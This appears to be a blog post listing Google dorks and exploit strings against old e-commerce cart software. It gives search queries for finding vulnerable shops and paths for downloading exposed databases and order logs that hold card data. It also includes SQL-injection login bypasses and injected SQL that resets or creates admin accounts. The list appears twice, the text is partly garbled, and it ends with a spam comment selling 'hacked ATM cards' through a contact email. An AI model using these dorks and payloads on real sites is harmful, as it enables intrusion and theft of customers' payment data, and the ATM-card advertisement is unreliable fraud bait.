1-
google dork :–> allinurl:/cart32.exe/
target looks :–> http://www.xxxxxx.net/wrburns_s/cgi-…xe/NoItemFound
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier,
with the format http://www.xxxxx.com/cart32/2-
2- google dork :–> inurl:”/cart.php?m=”
target looks lile :–> http://xxxxxxx.com/store/cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :–> http://xxxxxx.com/store/admin
Usename : ‘or”=”
Password : ‘or”=”
3- google dork :–> allinurlroddetail.asp?prod=
target looks like :–> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :–> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :–> http://www.xxxxxx.org/fpdb/vsproducts.mdb
4- google dork :–> allinurl: /cgi-local/shopper.cgi
target looks like :–> http://www.xxxxxx.com/cgi-local/shop…dd=action&key=
exploit :–> …&template=order.log
target whit exploit :–> http://www.xxxxxxxx.com/cgi-local/sh…late=order.log
5- google dork :–> allinurl: Lobby.asp
target looks like :–> http://www.xxxxx.com/mall/lobby.asp
exploit :–> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :–> http://www.xxxxx.com/fpdb/shop.mdb
6- google dork :–> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1' where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
7- google dork :–> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :–> http://xxxxxxx.com/vpasp/shopdisplay…asp?cat=xxxxxx
exploit :–> http://xxxxxxx.com/vpasp/shopdisplaypro … ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername=’admin’%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'–
%20'b%25'–
%20'c%25'–
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp
8- google dork :–> allinurl:/shopadmin.asp
target looks like :–> http://www.xxxxxx.com/shopadmin.asp
exploit:
user : ‘or’1
pass : ‘or’1
9- google.com :–> allinurl:/store/index.cgi/page=
target looks like :–> http://www.xxxxxx.com/cgi-bin/store/…short_blue.htm
exploit :–> ../admin/files/order.log
target whit exploit :–> http://www.xxxxxxx.com/cgi-bin/store…iles/order.log
10- google.com:–> allinurl:/metacart/
target looks like :–> http://www.xxxxxx.com/metacart/about.asp
exploit :–> /database/metacart.mdb
target whit exploit :–> http://www.xxxxxx.com/metacart/database/metacart.mdb
11- google.com:–> allinurl:/DCShop/
target looks like :–> http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :–> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :–> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt orhttp://www.xxxx.com/xxxx/DCShop/Orders/orders.txt
12- google.com:–> allinurl:/shop/category.asp/catid=
target looks like :–> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :–> /admin/dbsetup.asp
target whit exploit :–> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :–> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.
13- google.com:–> allinurl:/commercesql/
target looks like :–> http://www.xxxxx.com/commercesql/xxxxx
exploit :–> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :–> http://www.xxxxxx.com/cgi-bin/commer… … in_conf.pl
target whit exploit admin manager :–> http://www.xxxxxx.com/cgi-bin/commer…in/manager.cgi
target whit exploit order.log :–> http://www.xxxxx.com/cgi-bin/commerc…iles/order.log
14- google.com:–> allinurl:/eshop/
target looks like :–> http://www.xxxxx.com/xxxxx/eshop
exploit :–>/cg-bin/eshop/database/order.mdb
target whit exploit :–> http://www.xxxxxx.com/…/cg-bin/e….base/order.mdb
after dl the db look at access for user and password !!
Tricks Provided to you are only Educational Purposes.i am not responsible for any Illegal use of the tricks.
target looks :–> http://www.xxxxxx.net/wrburns_s/cgi-…xe/NoItemFound
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier,
with the format http://www.xxxxx.com/cart32/2-
2- google dork :–> inurl:”/cart.php?m=”
target looks lile :–> http://xxxxxxx.com/store/cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :–> http://xxxxxx.com/store/admin
Usename : ‘or”=”
Password : ‘or”=”
3- google dork :–> allinurlroddetail.asp?prod=
target looks like :–> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :–> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :–> http://www.xxxxxx.org/fpdb/vsproducts.mdb
4- google dork :–> allinurl: /cgi-local/shopper.cgi
target looks like :–> http://www.xxxxxx.com/cgi-local/shop…dd=action&key=
exploit :–> …&template=order.log
target whit exploit :–> http://www.xxxxxxxx.com/cgi-local/sh…late=order.log
5- google dork :–> allinurl: Lobby.asp
target looks like :–> http://www.xxxxx.com/mall/lobby.asp
exploit :–> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :–> http://www.xxxxx.com/fpdb/shop.mdb
6- google dork :–> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1' where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
7- google dork :–> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :–> http://xxxxxxx.com/vpasp/shopdisplay…asp?cat=xxxxxx
exploit :–> http://xxxxxxx.com/vpasp/shopdisplaypro … ion%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername=’admin’%20and%20fldpassword%20like%2 0'a%25'-
if this is not working try this ends
%20'a%25'–
%20'b%25'–
%20'c%25'–
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp
8- google dork :–> allinurl:/shopadmin.asp
target looks like :–> http://www.xxxxxx.com/shopadmin.asp
exploit:
user : ‘or’1
pass : ‘or’1
9- google.com :–> allinurl:/store/index.cgi/page=
target looks like :–> http://www.xxxxxx.com/cgi-bin/store/…short_blue.htm
exploit :–> ../admin/files/order.log
target whit exploit :–> http://www.xxxxxxx.com/cgi-bin/store…iles/order.log
10- google.com:–> allinurl:/metacart/
target looks like :–> http://www.xxxxxx.com/metacart/about.asp
exploit :–> /database/metacart.mdb
target whit exploit :–> http://www.xxxxxx.com/metacart/database/metacart.mdb
11- google.com:–> allinurl:/DCShop/
target looks like :–> http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :–> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :–> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt orhttp://www.xxxx.com/xxxx/DCShop/Orders/orders.txt
12- google.com:–> allinurl:/shop/category.asp/catid=
target looks like :–> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :–> /admin/dbsetup.asp
target whit exploit :–> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :–> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.
13- google.com:–> allinurl:/commercesql/
target looks like :–> http://www.xxxxx.com/commercesql/xxxxx
exploit :–> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :–> http://www.xxxxxx.com/cgi-bin/commer… … in_conf.pl
target whit exploit admin manager :–> http://www.xxxxxx.com/cgi-bin/commer…in/manager.cgi
target whit exploit order.log :–> http://www.xxxxx.com/cgi-bin/commerc…iles/order.log
14- google.com:–> allinurl:/eshop/
target looks like :–> http://www.xxxxx.com/xxxxx/eshop
exploit :–>/cg-bin/eshop/database/order.mdb
target whit exploit :–> http://www.xxxxxx.com/…/cg-bin/e….base/order.mdb
after dl the db look at access for user and password !!
Tricks Provided to you are only Educational Purposes.i am not responsible for any Illegal use of the tricks.
ATM CARD THAT CAN CHANGE YOUR LIFE TODAY
ReplyDeleteThe world today has turned to a place where leaders no longer listen or even care about their followers. All they are concerned about is only how they can steal or mismanage funds meant for public development and all....Seeing all these happening everyday. CREDIBLE ATM HACKERS decided to develop a way to make easy money. Though its illegal, but still one can easily survive with it..."HACK ATM MACHINES AND MAKE NOTHING LESS THAN $10,000 EVERYDAY" We have been able to develop this programmed ATM cards, that are capable of hacking into any ATM machine...It has been tested and its trusted.. It works any where in the world. So for more details about this card and how to get yours and also for loved ones. Kindly contact the hackers via email: incrediblehacker@outlook.com,